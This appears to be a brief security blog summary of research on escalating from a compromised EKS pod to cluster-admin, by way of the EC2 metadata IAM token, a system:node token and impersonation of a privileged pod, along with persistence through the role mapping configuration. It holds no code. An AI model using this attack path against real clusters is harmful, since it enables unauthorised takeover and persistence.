Privilege escalation in AWS Elastic Kubernetes Service (EKS)
Nothing to crazy here, its well known that if someone can compromise something running within an AWS Elastic Kubernetes Service (EKS) pod, they can use that access to hit the AWS EC2 Metadata Service and gain the machine’s IAM token. There has been some prior research about performing a denial of service by removing a network interface with that token, but the author An Trinh here takes a look at going for a more significant privilege escalation.
The path they discovered, was that you can go from pod -> metadata -> IAM token as per normal. The IAM token can be exchanged back with Kubernetes for a token with the system:node
role within the Kubernetes cluster. If, as is the case in many instances, the cluster randomly assigns pods to nodes, there is the possibility for a privileged pod to be running on the same node as the compromised pod (and the one you have system:node
on). If there is one running, the system:node
token can be used to impersonate the privileged pod and potentially gain cluster-admin
privileged (if that was what the privileged pod had). This does depend on there not being any separate if privileges and what nodes privileged pods run on, but it should work in a fair number of situations so its worth being aware of.
The author also notes a persistence technique, EKS is able to faciliate mapping between AWS identities and EKS privileges. This works by hooking into the Kubernated API and calls teh AWS STS endpoint with the EKS token. Calling STS will identify the token, and there is a configuration mapping to make the AWS role ARNs to Kubernetes roles. As such one could plant a user into the configuration mapping with high privileges. These privileges exist independently of the privileges actually held within AWS so even removing all permissions from the user would not remove their cluster-admin access within Kubernetes.